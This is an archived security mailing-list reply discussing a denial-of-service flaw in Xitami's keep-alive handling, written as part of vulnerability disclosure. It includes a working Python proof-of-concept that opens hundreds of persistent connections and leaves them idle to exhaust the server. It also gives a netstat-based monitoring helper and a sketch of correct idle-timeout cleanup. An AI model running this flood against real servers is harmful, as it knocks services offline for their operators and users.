Message-ID: <002c01c23c0e$ccae9f40$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Re: Clarification on Xitami DoS

>What is the vendor's status regarding this issue?

I've e-mailed the vendor, but have received no response *at all*.

>It is good we found the real cause of the DoS effect in Xitami.
>Because the maxedout values seem to work quite fine, the problem is
>Keep-Alive Connection handling.

Yes, I originally thought it was a connection flood because the connection
counts started jumping and then Xitami crashed almost immediately.  However,
I was actually seeing the effects of my flood combined with numerous
other connections that had "hung open".
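Roughly, the effect boils down to opening a large number of HTTP/1.1
keep-alive connections and simply holding them open.  A minimal sketch of
that idea (the host, port and connection count below are placeholders, not
the values from my actual test):

    # Illustrative sketch only: open many keep-alive connections and go idle.
    import socket, time

    HOST, PORT, COUNT = "192.168.0.10", 80, 500   # placeholders

    conns = []
    for _ in range(COUNT):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        # One valid request asking for a persistent connection, then go idle.
        s.sendall(b"GET / HTTP/1.1\r\nHost: " + HOST.encode() +
                  b"\r\nConnection: Keep-Alive\r\n\r\n")
        conns.append(s)

    # Never read, never close: if the server fails to time these out,
    # whatever it allocated per connection is simply gone.
    time.sleep(3600)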

>I don't know how you actually found out when it has dropped a
>particular connection

Well, I didn't find out when it was dropping connections, just that
it *wasn't* dropping any.  My WinME box, by the way, required an
extremely high number of connections to crash (I believe the number
was over 450), so production machines will require significantly
more connections -- it seems to be bug-induced resource exhaustion.
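One crude way to watch for that is to count the ESTABLISHED entries for
the server's port over time; a hypothetical helper along these lines (it
assumes only that netstat -an is available):

    # Hypothetical helper: count ESTABLISHED connections on a given port
    # by parsing `netstat -an` output.  Port 80 is just an example.
    import subprocess

    def established_count(port=80):
        out = subprocess.run(["netstat", "-an"],
                             capture_output=True, text=True).stdout
        needle = ":%d " % port
        return sum(1 for line in out.splitlines()
                   if "ESTABLISHED" in line and needle in line)

    print(established_count(80))

If that number only ever climbs while the keep-alive connections sit idle,
the server clearly isn't reaping them.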

>as in the duration of Keep-Alive affected and
>its connection dropping time and whether it matches the value in
>the configuration? after how long?
>I tried netstat -an frequently by making requests from different hosts on
>my network, but got the same results as I told you before.

I'm still a bit hazy on exactly *where* in the keep-alive handling
Xitami is buggy -- I'm beginning to think that it is not actually related
to an open connection, and is instead just bad resource cleanup on
the server end.
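
For what it's worth, the behaviour I'd expect from a correct server is
sketched below: remember when each keep-alive connection last did useful
work and close anything idle past the configured timeout.  This is purely
an illustration of the general idea, not Xitami's actual code (the timeout
and port are made-up values):

    # Illustrative only: the general shape of keep-alive idle-timeout
    # handling a server is expected to perform.
    import select, socket, time

    KEEPALIVE_TIMEOUT = 30          # seconds; placeholder value

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("", 8080))       # placeholder port
    listener.listen(128)

    last_active = {}                # client socket -> time of last request

    while True:
        readable, _, _ = select.select([listener] + list(last_active), [], [], 1.0)
        now = time.time()
        for s in readable:
            if s is listener:
                conn, _ = s.accept()
                last_active[conn] = now
            elif s.recv(4096):
                s.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
                last_active[s] = now
            else:                   # peer closed; clean up immediately
                del last_active[s]
                s.close()
        # The step a buggy server could be missing: reap idle keep-alives.
        for s in [c for c, t in last_active.items() if now - t > KEEPALIVE_TIMEOUT]:
            del last_active[s]
            s.close()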

